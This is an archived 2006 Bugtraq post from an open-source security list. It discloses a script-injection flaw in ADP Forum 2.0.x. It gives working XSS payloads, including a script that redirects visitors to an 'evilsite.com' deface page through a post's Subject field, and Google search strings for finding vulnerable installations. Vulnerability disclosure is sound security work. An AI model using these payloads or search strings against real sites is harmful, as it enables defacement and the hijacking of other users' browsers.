| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060309142115.18490.qmail@securityfocus.com> Date: 9 Mar 2006 14:21:15 -0000 From: liz0@...mail.com To: bugtraq@...urityfocus.com Subject: ADP Forum 2.0,* script İnjection ADP Forum 2.0,* script İnjection ---------------------------------------------------- site:http://www.linux.it/~fedro/ demo:http://www.adp.host.sk/Forum203/ -------------------------------------------------- Post This Code: <script>alert(/Liz0ziM/)</script> <script>location.href="http://evilsite.com/deface.html";</script> vs.. --------------------------------------------------------- Example Post Message : Name :Liz0ziM Username :username Password :password E-mail :liz0@...mail.com Subject :<script>location.href="http://evilsite.com/deface.html";</script> Message :LOL :=) --------------------------------------------------------- Credit:Liz0ziM Mail :liz0@...mail.com Site :www.biyosecurity.com BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w ------------------------------------------------------------ google: "ADP Forum 2.0.3 is powered by VzScripts" "ADP Forum 2.0.2" "ADP Forum 2.0.1" "ADP Forum 2.0" ------------------------------------------------------------ Source: http://www.blogcu.com/Liz0ziM/338614/ http://biyosecurity.be/bugs/adpforum2.html http://biyosecurity.be/bugs/adpforum2.txt
Powered by blists - more mailing lists